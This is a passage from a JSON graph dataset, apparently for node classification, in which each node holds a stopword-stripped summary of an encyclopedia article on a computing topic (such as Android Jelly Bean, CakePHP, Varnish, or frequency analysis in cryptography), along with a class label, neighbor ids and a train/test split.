      7855,
      1970,
      6834,
      5433,
      7739,
      316,
      3262,
      9791,
      10307,
      3525,
      7368,
      9160,
      1493,
      9688,
      6105,
      7515,
      8668,
      10717,
      357,
      3941,
      6373,
      107,
      11244,
      6645,
      3447,
      2041,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9608,
    "label": 9,
    "text": "B32_Business_Basic:b32 business basic b32 business basic competitor data general business basic written murray haszard 1986 ran data general eclipse mv line computers initially ported unix 1989 dos 1991 b32 software company developed supported b32 business basic original site auckland new zealand supplemented sales support centre blue ash ohio b32 interpreter highly compatible data general business basic dgbb also enhanced extended language many ways like dgbb b32 could access data general infos ii database could use dgbb lock server improved version b32 twice fast number crunching string manipulation disk i/o many internal restrictions dgbb removed b32 allowed 32,767 line numbers 65,535 later versions compared dgbb 9,999 b32 allowed memory programs simultaneous locks files open language enhancements included high-speed internal sort routine do-while blocks ability step backwards indexed file debugging facilities also significantly improved dgbb b32 allowed programs run full cursor positioning attribute support non-data general terminals even programs data general control sequences hard-coded b32 carried arithmetic quad precision i.e 64-bit emulated triple precision double precision versions dgbb runtime avoided subtle incompatibilities two versions dgbb unix dos b32 emulated commonly used system calls data general aos/vs rdos operating systems including implementing symbolic links sco xenix dos 1991 features war b32 one competitors transoft universal business basic saw major improvements b32 language b32 added bluebird business basic emulation mode made line numbers optional added subroutine calls name parameter passing transoft greater financial resources b32 effective marketing purchased b32 1992 dos unix versions b32 discarded universal business basic ran operating systems eclipse mv version b32 continued sold mv line lasted b32 software staff blue ash moved transoft atlanta georgia office new zealand staff went found binary research",
    "neighbors": [
      6787,
      5492,
      8999
    ],
    "mask": "Train"
  },
  {
    "node_id": 9609,
    "label": 2,
    "text": "Windows_RSS_Platform:windows rss platform windows rss platform included internet explorer 7 later windows vista later platform exposes feed handling management windows applications rss support internet explorer built windows rss platform windows rss platform consists three components start",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      6171,
      1055,
      7713,
      2083,
      8227,
      1577,
      10282,
      4143,
      9263,
      11316,
      1077,
      8246,
      10808,
      1098,
      4174,
      9808,
      4178,
      9813,
      8281,
      603,
      2145,
      9328,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      651,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      2777,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      790,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      11060,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      6028,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      969,
      7629,
      9167,
      11223,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9610,
    "label": 2,
    "text": "Android_Jelly_Bean:android jelly bean android jelly bean tenth version android codename given three major point releases android mobile operating system developed google spanning versions 4.1 4.3.1 operating systems run android 4.3/4.4 asus nexus 7 2013 first three 4.1 unveiled google i/o developer conference june 2012 focusing performance improvements designed give operating system smoother responsive feel improvements notification system allowing expandable notifications action buttons internal changes two releases made jelly bean name october 2012 july 2013 respectively including 4.2—which included optimizations multi-user support tablets lock screen widgets quick settings screen savers 4.3—contained improvements updates underlying android platform jelly bean versions longer supported google statistics issued google indicate 3.2 android devices accessing google play run jelly bean android 4.1 jelly bean first unveiled google i/o developer conference june 27 2012 focus delightful improvements platform user interface along improvements google search experience platform knowledge graph integration new digital assistant google unveiling asus-produced nexus 7 tablet unveiling nexus q media player jelly bean work made optimizing operating system visual performance responsiveness series changes referred project butter graphical output triple buffered vsync used across drawing operations cpu brought full power touch input detected—preventing lag associated inputs made processor low-power state changes allow operating system run full 60 frames per second capable hardware following 4.1 two android releases made jelly bean codename releases focused primarily performance improvements changes android platform contained relatively user-facing changes alongside android 4.1 google also began decouple apis services android new system-level component known google play services serviced google play store allows addition certain forms functionality without distribute upgrade operating system addressing infamous fragmentation problems experienced android ecosystem attendees google i/o conference given nexus 7 tablets pre-loaded android 4.1 galaxy nexus smartphones could upgraded 4.1 google announced intent release 4.1 updates existing nexus devices motorola xoom tablet mid-july android 4.1 upgrade released general public gsm galaxy nexus models july 10 2012 late 2012 following official release jelly bean number third-party android oems began prepare distribute updates 4.1 existing smartphones tablets including devices acer htc lg motorola samsung sony toshiba august 2012 nightly builds aftermarket firmware cyanogenmod based 4.1 branded cyanogenmod 10 began released selected devices including nexus devices nexus galaxy nexus samsung galaxy galaxy ii galaxy tab 2 7.0 motorola xoom asus transformer october 29 2012 google unveiled android 4.2 dubbed sweeter tasting jelly bean alongside accompanying launch devices nexus 4 nexus 10 firmware updates nexus 7 galaxy nexus released november 2012 android 4.3 subsequently released july 24 2013 via firmware updates galaxy nexus 2012 nexus 7 nexus 4 nexus 10 visually jelly bean interface reflects refinement holo appearance introduced android 4.0 default home screen jelly bean received new features ability shortcuts widgets home screen page re-arrange fit item moved resized notification system also improved addition expandable actionable notifications individual notifications display additional content action buttons call back message missed call accessible dragging open notification two finger gesture notifications also disabled individually per-app android 4.2 added additional features user interface lock screen swiped left display widget pages swiped right go camera pane quick settings toggles feature often seen oem android skins also added notification area—accessible either swiping two fingers phones swiping top-right edge screen tablets pressing button top-right corner notifications pane previous browser application officially deprecated 4.2 favor google chrome android 4.2 also adds gesture typing keyboard redesigned clock app new screen saver system known daydreams tablets android 4.2 also supports multiple users promote consistency device classes android tablets use expanded version interface layout home screen used phones default centered navigation keys status bar across top changes took effect small tablets nexus 7 4.1 larger tablets 4.2 small tablets android optimized primarily use portrait vertical orientation giving apps expanded versions layouts used phones used landscape horizontal orientation apps adjust widescreen-oriented layouts seen larger tablets large tablets navigation buttons previously placed bottom-left bar along bottom screen clock notification area bottom-right developers 4.1 also added new accessibility apis expanded language support bi-directional text support user-supplied keymaps support managing external input devices video game controllers support multichannel usb gapless audio new media routing api low-level access hardware software audio video codecs dns-based service discovery pre-associated service discovery wi-fi android beam also used initiate bluetooth file transfers near-field communication android 4.2 added rewritten bluetooth stack changing previous bluez stack gpl originated qualcomm rewritten broadcom open source stack called bluedroid new stack initially considered immature promised several forward-looking benefits including improved support multiple displays support miracast native right-to-left support updated developer tools accessibility improvements zooming gestures number internal security improvements always-on vpn support app verification new nfc stack added time android 4.3 consisted low-level changes including bluetooth low energy avrcp support selinux opengl es 3.0 new digital rights management drm apis ability apps read notifications vp8 encoder improvements android 4.3 also included hidden privacy feature known app ops allowed users individually deny permissions apps however feature later removed android 4.4.2 google spokesperson stated feature experimental could prevent certain apps functioning correctly used certain ways concept revisited basis redesigned notifications system android 6.0",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      2630,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      11396,
      1670,
      9863,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      11430,
      1203,
      7359,
      1728,
      9923,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      4374,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      4952,
      5467,
      3940,
      5483,
      7548,
      4995,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      5065,
      2001,
      5078,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 9611,
    "label": 3,
    "text": "Penryn_(microarchitecture):penryn microarchitecture intel tick-tock cycle 2007/2008 tick shrink core microarchitecture 45 nanometers cpuid model 23 core 2 processors used code names penryn socket p wolfdale lga 775 yorkfield mcm lga 775 also sold celeron pentium xeon processors xeon brand wolfdale-dp harpertown code names used lga 771 based mcms two four active wolfdale cores architectural improvements 65 nanometer core 2 cpus include new divider reduced latency new shuffle engine sse4.1 instructions enabled new single-cycle shuffle engine maximum l2 cache size per chip increased 4 6 mb l2 associativity increased 16-way 24-way cut-down versions 3 mb l2 also exist commonly called penryn-3m wolfdale-3m well yorkfield-6m respectively single-core version penryn listed penryn-l separate model like merom-l version penryn-3m model one active core processors core microarchitecture categorized number cores cache size socket combination unique code name product code used across number brands instance code name allendale product code 80557 two cores 2 mb l2 cache uses desktop socket 775 marketed celeron pentium core 2 xeon different sets features enabled mobile desktop processors come two variants differ size l2 cache specific amount l2 cache product also reduced disabling parts production time wolfdale-dp quad-core processors except dunnington qc multi-chip modules combining two dies 65 nm processors product code shared processors different dies specific information one used derived stepping model 23 cpuid 01067xh intel started marketing stepping full 6 mib reduced 3 mib l2 cache time giving identical cpuid values steppings new sse4.1 instructions stepping c1/m1 bug fix version c0/m0 specifically quad core processors used stepping e0/r0 adds two new instructions xsave/xrstor replaces earlier steppings mobile processors stepping c0/m0 used intel mobile 965 express santa rosa refresh platform whereas stepping e0/r0 supports later intel mobile 4 express montevina platform model 29 stepping a1 cpuid 106d1h adds l3 cache well six instead usual two cores leads unusually large die size 503 mm² february 2008 found way high-end xeon 7400 series dunnington",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      4108,
      9741,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      5883,
      6175,
      2088,
      2604,
      10669,
      9391,
      6192,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      7105,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      5073,
      5844,
      7134,
      1119,
      5606,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      10734,
      499,
      8820,
      3317,
      4217,
      4603,
      5503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9612,
    "label": 2,
    "text": "Windows_Advanced_Rasterization_Platform:windows advanced rasterization platform windows advanced rasterization platform warp software rasterizer component directx graphics runtime windows 7 later available windows vista windows server 2008 platform update windows vista warp used compatible hardware available kernel mode applications headless environment remote rendering direct2d/directwrite remote desktop connection clients warp full-featured direct3d 10.1 renderer device performance par current low-end graphics cards intel gma 3000 running multi-core cpus achieve level rendering performance warp employs advanced techniques just-in-time compilation x86 machine code support advanced vector extensions sse2 sse4.1 warp supports direct3d 11 runtime compatible feature levels 10_1 10_0 9_3 9_2 9_1 direct3d 11.1 runtime warp additionally supports feature levels 11_0 11_1 windows 8 warp provides functionality microsoft basic render driver replaces kernel-mode vga driver windows 8.1 warp updated support feature level 11_1 tiled resources windows 10 warp updated support direct3d 12 feature level 12_1 direct3d 12 warp also replaces reference rasterizer",
    "neighbors": [
      5761,
      10243,
      9348,
      5765,
      10886,
      2183,
      9609,
      5386,
      651,
      5259,
      653,
      6797,
      6927,
      9234,
      1043,
      3224,
      5401,
      5913,
      5119,
      11546,
      10654,
      1055,
      4384,
      8607,
      8609,
      2083,
      4771,
      8227,
      2854,
      7846,
      10024,
      1577,
      10026,
      10029,
      10414,
      4143,
      9263,
      11570,
      8246,
      6584,
      2493,
      5952,
      1348,
      844,
      7629,
      4178,
      5844,
      9813,
      214,
      9434,
      603,
      10079,
      736,
      4321,
      6114,
      6370,
      4836,
      8161,
      11616,
      1770,
      11498,
      9196,
      3821,
      4590,
      10991,
      11247,
      499,
      3573,
      10229,
      1656,
      5754,
      9340,
      7421,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 9613,
    "label": 7,
    "text": "Deutsche_Börse_Cloud_Exchange_AG:deutsche börse cloud exchange ag deutsche börse cloud exchange ag dbce joint venture established may 2013 deutsche börse ag zimory gmbh operates international marketplace buying selling cloud resources users marketplace either cover additional storage computing requirements offer iaas capacities begin february 2016 dbce publicly announced discontinuing operations march 2016 website www.cloud.exchange following message deutsche börse cloud exchange discontinues operations dear visitor shareholders deutsche börse cloud exchange decided cease operations marketplace evaluating business model approach company ended registration new users marketplace january 18 existing contracts fulfilled expire accordance individual agreements public marketplace scheduled retired march 2016 thank interest cooperation support please contact us directly case questions dbce team vendor-agnostic iaas marketplace dbce functions neutral intermediary cloud providers cloud users marketplace providers offer infrastructure resources cpu storage ram service side buyers opportunity search buy subsequently use appropriate iaas offers providers access marketplace reserved companies open private individuals marketplace dbce platform worldwide iaas resources compared purchased used paid standardized basis makes individual offers providers directly comparable creating transparency buyer 2013 dbce established joint venture deutsche börse ag zimory gmbh beginning 2014 marked beta launch cloud marketplace various providers already linked services marketplace official launch marketplace may 20 2015 start five providers various european countries offered iaas resources via dbce contrast marketplaces cloud services dbce seeks make available vendor-agnostic cloud resources procured via marketplace means system behind trading platform offers central interface api standard cloud technologies enables provision purchased resources independent technologies used customers therefore enables companies liberate proprietary systems order guarantee quality security services dbce cooperation tüv rheinland developed special testing procedure providers prerequisite access marketplace existing suppliers marketplace annual review various parameters conducted including performance services offered well modifications storage location servers marketplace based consistent standardization concept addition standardized seek buy procedure agreements buyers dbce standardized well intended accelerate normally drawn-out contract negotiations providers users cloud sector dbce acts controlling entity thus ensures certain security compliance procedures always upheld services traded via marketplace also standardized order enable comparison individual provider offers storage available blocks 100 gigabytes memory gibibytes compute resources dbce introduced performance unit pu dbce differentiates cloud providers different cpu offers normally difficult compare dbce specifies pu defined standard cpu offers marketplace means matter provider buyer procuring cpu resources via marketplace pu always delivers comparable performance independent underlying hardware dbce 49 employees comprising experts cloud computing industry financial sector members management board deutsche börse cloud exchange ag randolf roth maximilian ahrens",
    "neighbors": [
      4429
    ],
    "mask": "Test"
  },
  {
    "node_id": 9614,
    "label": 8,
    "text": "CakePHP:cakephp cakephp open-source web framework follows model–view–controller mvc approach written php modeled concepts ruby rails distributed mit license cakephp uses well-known software engineering concepts software design patterns convention configuration model–view–controller active record association data mapping front controller cakephp started april 2005 polish programmer michal tatarynowicz wrote minimal version rapid application development framework php dubbing cake published framework mit license opened online community developers december 2005 l. masters g. j. woodworth founded cake software foundation promote development related cakephp version 1.0 released may 2006 one project inspirations ruby rails using many concepts community since grown spawned several sub-projects october 2009 project manager woodworth developer n. abele resigned project focus projects including lithium web framework previously part cakephp project remaining development team continued focus original roadmap previously defined cake software foundation operates annual conference focusing cakephp called cakefest initially held bi-annual event 2008",
    "neighbors": [
      1920,
      3462,
      5255,
      3080,
      8582,
      1034,
      6154,
      2062,
      2576,
      148,
      1812,
      6941,
      9245,
      10526,
      2465,
      7074,
      8739,
      3876,
      4777,
      7210,
      2348,
      5165,
      7983,
      4529,
      7987,
      692,
      8883,
      5048,
      6074,
      190,
      6338,
      9666,
      2372,
      8644,
      1353,
      4171,
      210,
      595,
      84,
      11221,
      4056,
      10587,
      6493,
      11357,
      3553,
      102,
      7785,
      8554,
      7147,
      5612,
      8691,
      4853,
      3705,
      11259,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 9615,
    "label": 4,
    "text": "Index_of_coincidence:index coincidence cryptography coincidence counting technique invented william f. friedman putting two texts side-by-side counting number times identical letters appear position texts count either ratio total normalized dividing expected count random source model known index coincidence ic short index coincidence provides measure likely draw two matching letters randomly selecting two letters given text chance drawing given letter text number times letter appears length text chance drawing letter without replacement appearances 1 text length 1 product two values gives chance drawing letter twice row one find product letter appears text sum products get chance drawing two kind probability normalized multiplying coefficient typically 26 english express index coincidence ic given letter-frequency distribution summation n length text n n frequencies integers c letters alphabet c 26 monocase english sum n necessarily n products count number combinations n elements taken two time actually counts pair twice extra factors 2 occur numerator denominator formula thus cancel n occurrences -th letter matches remaining occurrences letter total letter pairs entire text 1/ c probability match pair assuming uniform random distribution characters null model see thus formula gives ratio total number coincidences observed total number coincidences one would expect null model expected average value ic computed relative letter frequencies source language letters alphabet equally probable expected index would 1.0 actual monographic ic telegraphic english text around 1.73 reflecting unevenness natural-language letter distributions sometimes values reported without normalizing denominator example english values may called κ kappa-plaintext rather ic κ kappa-random used denote denominator expected coincidence rate uniform distribution alphabet english index coincidence useful analysis natural-language plaintext analysis ciphertext cryptanalysis even ciphertext available testing plaintext letter identities disguised coincidences ciphertext caused coincidences underlying plaintext technique used cryptanalyze vigenère cipher example repeating-key polyalphabetic cipher arranged matrix coincidence rate within column usually highest width matrix multiple key length fact used determine key length first step cracking system coincidence counting help determine two texts written language using alphabet technique used examine purported bible code causal coincidence count texts distinctly higher accidental coincidence count texts different languages texts using different alphabets gibberish texts see imagine alphabet two letters b suppose language letter used 75 time letter b used 25 time two texts language laid side side following pairs expected overall probability coincidence 62.5 56.25 aa 6.25 bb consider case messages encrypted using simple monoalphabetic substitution cipher replaces b vice versa overall probability coincidence situation 62.5 6.25 aa 56.25 bb exactly unencrypted plaintext case effect new alphabet produced substitution uniform renaming original character identities affect whether match suppose one message say second encrypted using substitution cipher b → b following pairs expected probability coincidence 37.5 18.75 aa 18.75 bb noticeably lower probability same-language same-alphabet texts used evidently coincidences likely frequent letters text principle applies real languages like english certain letters like e occur much frequently letters—a fact used frequency analysis substitution ciphers coincidences involving letter e example relatively likely two english texts compared coincidence count higher english text foreign-language text used easily imagined effect subtle example similar languages higher coincidence count dissimilar languages also n't hard generate random text frequency distribution similar real text artificially raising coincidence count nevertheless technique used effectively identify two texts likely contain meaningful information language using alphabet discover periods repeating keys uncover many kinds nonrandom phenomena within among ciphertexts expected values various languages description introduction use index coincidence related general concept correlation various forms index coincidence devised delta i.c given formula effect measures autocorrelation single distribution whereas kappa i.c used matching two text strings although applications constant factors formula_4 formula_5 ignored general situations considerable value truly indexing i.c value expected null hypothesis usually match uniform random symbol distribution every situation expected value correlation 1.0 thus form i.c expressed ratio number coincidences actually observed number coincidences expected according null model using particular test setup foregoing easy see formula kappa i.c formula_5 common aligned length two texts b bracketed term defined 1 formula_8-th letter text matches formula_8-th letter text b otherwise 0 related concept bulge distribution measures discrepancy observed i.c null value 1.0 number cipher alphabets used polyalphabetic cipher may estimated dividing expected bulge delta i.c single alphabet observed bulge message although many cases repeating key used better techniques available practical illustration use i.c. suppose intercepted following ciphertext message suspecting english plaintext encrypted using vigenère cipher normal a–z components short repeating keyword consider ciphertext stacked number columns example seven key size happens assumed number columns letters within single column enciphered using key letter effect simple caesar cipher applied random selection english plaintext characters corresponding set ciphertext letters roughness frequency distribution similar english although letter identities permuted shifted constant amount corresponding key letter therefore compute aggregate delta i.c columns delta bar around 1.73 hand incorrectly guessed key size number columns aggregate delta i.c around 1.00 compute delta i.c assumed key sizes one ten see key size likely five actual size five would expect width ten also report high i.c. since columns also corresponds simple caesar encipherment confirm stack ciphertext five columns try determine likely key letter column considered separately performing trial caesar decryption entire column 26 possibilities a–z key letter choosing key letter produces highest correlation decrypted column letter frequencies relative letter frequencies normal english text correlation n't need worry normalizing readily computed formula_11 observed column letter frequencies formula_12 relative letter frequencies english try best-fit key letters reported codice_1 recognize actual word using vigenère decryption produces plaintext one obtains word divisions restored obvious positions codice_2 evidently null characters used pad final group transmission entire procedure could easily packaged automated algorithm breaking ciphers due normal statistical fluctuation algorithm occasionally make wrong choices especially analyzing short ciphertext messages",
    "neighbors": [
      8674,
      4007,
      6599,
      3629,
      5487,
      6928,
      1105,
      9617,
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 9616,
    "label": 8,
    "text": "Varnish_(software):varnish software varnish http accelerator designed content-heavy dynamic web sites well apis contrast web accelerators squid began life client-side cache apache nginx primarily origin servers varnish designed http accelerator varnish focused exclusively http unlike proxy servers often support ftp smtp network protocols varnish used websites including wikipedia online newspaper sites new york times guardian gulf news hindu corriere della sera social media content sites facebook twitter reddit spotify vimeo tumblr 2012 5 top 10,000 sites web used software project initiated online branch norwegian tabloid newspaper verdens gang architect lead developer danish independent consultant poul-henning kamp well-known freebsd core developer management infrastructure additional development originally provided norwegian linux consulting company linpro support management development varnish later spun separate company varnish software varnish free open source software available two-clause bsd license commercial support available varnish software amongst others version 1.0 varnish released 2006 varnish 2.0 2008 varnish 3.0 2011 varnish 4.0 2014 varnish 5.0 2016 varnish 6.0 march 2018 varnish stores data virtual memory leaves task deciding stored memory gets paged disk operating system helps avoid situation operating system starts caching data moved disk application varnish heavily threaded client connection handled separate worker thread configured limit number active worker threads reached incoming connections placed overflow queue queue reaches configured limit incoming connections rejected principal configuration mechanism varnish configuration language vcl domain-specific language dsl used write hooks called critical points handling request policy decisions left vcl code making varnish configurable adaptable http accelerators vcl script loaded translated c compiled shared object system compiler loaded directly accelerator thus reconfigured without restart number run-time parameters control things maximum minimum number worker threads various timeouts etc command-line management interface allows parameters modified new vcl scripts compiled loaded activated without restarting accelerator order reduce number system calls fast path minimum log data stored shared memory task monitoring filtering formatting writing log data disk delegated separate application varnish designed reduce contention threads minimum authors claim performance good system pthreads implementation additionally slow malloc implementation like ones microsoft windows msvcrt may add unnecessary contention thereby limit performance hence general recommendation running varnish linux unix based environments varnish cache speed information delivery factor several hundred ensure proper operation performance varnish exposes metrics monitored following areas varnish cache ships monitoring logging tools one used varnishstat gives detailed snapshot varnish ’ current performance provides access in-memory statistics cache hits misses resource consumption threads created running varnishstat command line returns continuously updating list available varnish metrics -1 flag added varnishstat exit printing list one time varnishstat used standalone tool spot-check health cache order graph metrics time correlate statistics across infrastructure set alerts problems may arise monitoring services integrate varnish collect varnishstat metrics varnishlog tool used debug tune varnish configuration provides detailed information individual request varnish supports load balancing using round robin random director per-backend weighting basic health-checking backends also available varnish cache also features",
    "neighbors": [
      2060,
      6797,
      11539,
      2339,
      3237,
      7983,
      9909,
      823,
      64,
      7364,
      9926,
      1223,
      4561,
      9306,
      4186,
      865,
      9320,
      6894,
      5492,
      4725,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9617,
    "label": 4,
    "text": "Frequency_analysis:frequency analysis cryptanalysis frequency analysis also known counting letters study frequency letters groups letters ciphertext method used aid breaking classical ciphers frequency analysis based fact given stretch written language certain letters combinations letters occur varying frequencies moreover characteristic distribution letters roughly almost samples language instance given section english language samp e /samp samp /samp samp /samp samp /samp common samp z /samp samp q /samp samp x /samp rare likewise samp th /samp samp er /samp samp /samp samp /samp common pairs letters termed bigrams digraphs samp ss /samp samp ee /samp samp tt /samp samp ff /samp common repeats nonsense phrase etaoin shrdlu represents 12 frequent letters typical english language text ciphers properties natural language plaintext preserved ciphertext patterns potential exploited ciphertext-only attack simple substitution cipher letter plaintext replaced another particular letter plaintext always transformed letter ciphertext instance occurrences letter samp e /samp turn letter samp x /samp ciphertext message containing numerous instances letter samp x /samp would suggest cryptanalyst samp x /samp represents samp e /samp basic use frequency analysis first count frequency ciphertext letters associate guessed plaintext letters samp x /samp ciphertext anything else suggests samp x /samp corresponds samp e /samp plaintext certain samp /samp samp /samp also common english samp x /samp might either also unlikely plaintext samp z /samp samp q /samp less common thus cryptanalyst may need try several combinations mappings ciphertext plaintext letters complex use statistics conceived considering counts pairs letters bigrams triplets trigrams done provide information cryptanalyst instance samp q /samp samp u /samp nearly always occur together order english even though samp q /samp rare suppose eve intercepted cryptogram known encrypted using simple substitution cipher follows example uppercase letters used denote ciphertext lowercase letters used denote plaintext guesses samp x /samp samp /samp used express guess ciphertext letter samp x /samp represents plaintext letter samp /samp eve could use frequency analysis help solve message along following lines counts letters cryptogram show samp /samp common single letter samp xl /samp common bigram samp xli /samp common trigram samp e /samp common letter english language samp th /samp common bigram samp /samp common trigram strongly suggests samp x /samp samp /samp samp l /samp samp h /samp samp /samp samp e /samp second common letter cryptogram samp e /samp since first second frequent letters english language samp e /samp samp /samp accounted eve guesses samp e /samp samp /samp third frequent letter tentatively making assumptions following partial decrypted message obtained using initial guesses eve spot patterns confirm choices samp /samp moreover patterns suggest guesses samp rtate /samp might samp state /samp would mean samp r /samp samp /samp similarly samp atthattmze /samp could guessed samp atthattime /samp yielding samp /samp samp /samp samp z /samp samp /samp furthermore samp heve /samp might samp /samp giving samp v /samp samp r /samp filling guesses eve gets turn guesses suggest still others example samp remara /samp could samp remark /samp implying samp /samp samp k /samp relatively straightforward deduce rest letters eventually yielding plaintext point would good idea eve insert spaces punctuation example gold-bug eve guesses correct would always case however variation statistics individual plaintexts mean initial guesses incorrect may necessary backtrack incorrect guesses analyze available statistics much depth somewhat simplified justifications given example also possible plaintext exhibit expected distribution letter frequencies shorter messages likely show variation also possible construct artificially skewed texts example entire novels written omit letter samp e /samp altogether — form literature known lipogram first known recorded explanation frequency analysis indeed kind cryptanalysis given 9th century al-kindi arab polymath manuscript deciphering cryptographic messages suggested close textual study qur'an first brought light arabic characteristic letter frequency use spread similar systems widely used european states time renaissance 1474 cicco simonetta written manual deciphering encryptions latin italian text arabic letter frequency detailed study letter word frequency analysis entire book qur'an provided intellaren articles several schemes invented cryptographers defeat weakness simple substitution encryptions included disadvantage attempts defeat frequency counting attacks increases complication enciphering deciphering leading mistakes famously british foreign secretary said rejected playfair cipher even school boys could cope successfully wheatstone playfair shown attachés could never learn rotor machines first half 20th century example enigma machine essentially immune straightforward frequency analysis however kinds analysis attacks successfully decoded messages machines frequency analysis requires basic understanding statistics plaintext language problem solving skills performed hand tolerance extensive letter bookkeeping world war ii wwii british americans recruited codebreakers placing crossword puzzles major newspapers running contests could solve fastest several ciphers used axis powers breakable using frequency analysis example consular ciphers used japanese mechanical methods letter counting statistical analysis generally ibm card type machinery first used world war ii possibly us army sis today hard work letter counting analysis replaced computer software carry analysis seconds modern computing power classical ciphers unlikely provide real protection confidential data frequency analysis described fiction edgar allan poe gold-bug sir arthur conan doyle sherlock holmes tale adventure dancing men examples stories describe use frequency analysis attack simple substitution ciphers cipher poe story encrusted several deception measures literary device anything significant cryptographically",
    "neighbors": [
      8674,
      11241,
      3694,
      5487,
      6223,
      1105,
      6578,
      8978,
      2580,
      1941,
      9615,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 9618,
    "label": 9,
    "text": "FarCry_CMS:farcry cms farcry cms popular open-source content management system cfml built farcry core addition standard cms features menu management system administration page layout customization farcry features also include farcry framework actively maintained daemon internet consultants",
    "neighbors": [
      4512,
      5314,
      8739,
      9666,
      102,
      5612,
      3469,
      7983,
      4529,
      148,
      7862,
      3895,
      5048,
      9144,
      4507
    ],
    "mask": "Test"
  },
  {
    "node_id": 9619,
    "label": 2,
    "text": "IBM_8100_DPCX:ibm 8100 dpcx dpcx distributed processing control executive operating system ibm 8100 small computer system ibm hoped would help installed base ibm 3790 customers migrate 8100 dppx operating system mainly deployed support word processing system distributed office support facility dosf derived earlier ibm 3730 word processing system like dppx written pl/s-like pl/ds language applications including much dosf however written interpreted language compiled using system/370 assembler macro facility 8100/dpcx/dosf system first type distributed system connect ibm distributed office support system disoss running data host later versions disoss relied sna distribution system snads eventually became peer-to-peer communication documents complied document interchange architecture dia document content architecture dca types distributed system gained disoss support – scanmaster displaywriter 5520 office system",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      7053,
      11673,
      6557,
      3359,
      10273,
      6442,
      7983,
      9139,
      6325,
      573,
      8640,
      1219,
      964,
      6342,
      8262,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      6503,
      9829,
      375,
      2168,
      3323,
      2172,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 9620,
    "label": 2,
    "text": "Workgroup_(computer_networking):workgroup computer networking workgroup microsoft term peer-to-peer local area network computers running microsoft operating systems workgroup may share files printers internet connection workgroup contrasts domain computers rely centralized authentication",
    "neighbors": [
      2432,
      8640,
      7847,
      651,
      6797,
      238,
      7983,
      8080,
      601
    ],
    "mask": "Train"
  },
  {
    "node_id": 9621,
    "label": 2,
    "text": "Carrier_Grade_Linux:carrier grade linux carrier grade linux cgl set specifications detail standards availability scalability manageability service response characteristics must met order linux kernel-based operating system considered carrier grade i.e ready use within telecommunications industry term particularly applicable telecom converges technically data networks commercial off-the-shelf commoditized components blade servers carrier-grade term public network telecommunications products require 5 nines 6 nines 99.999 99.9999 percent availability translates downtime per year 30 seconds 6 nines 5 minutes 5 nines term 5 nines usually associated carrier-class servers 6 nines usually associated carrier-class switches primary motivation behind cgl effort present open architecture alternative closed proprietary software proprietary hardware systems currently used telecommunication systems proprietary systems monolithic hardware software applications integrated tightly operate well unit however hard maintain scale telecommunications companies utilize services vendor even relatively minor enhancements system cgl seeks progressively reduce eliminate dependence proprietary systems provide path easy deployment scalability utilizing cheap cots systems assemble telecommunications system cgl effort started open source development lab cgl working group specification combined linux foundation latest specification release cgl 5.0 several cgl-registered linux distributions exist including montavista wind river systems red flag linux osdl cglwg defines three main types applications carrier-grade linux support — gateways signaling servers management",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      3168,
      6244,
      5222,
      10856,
      4207,
      7802,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      11428,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      6419,
      792,
      10016,
      295,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      10111,
      8066,
      900,
      5514,
      4493,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
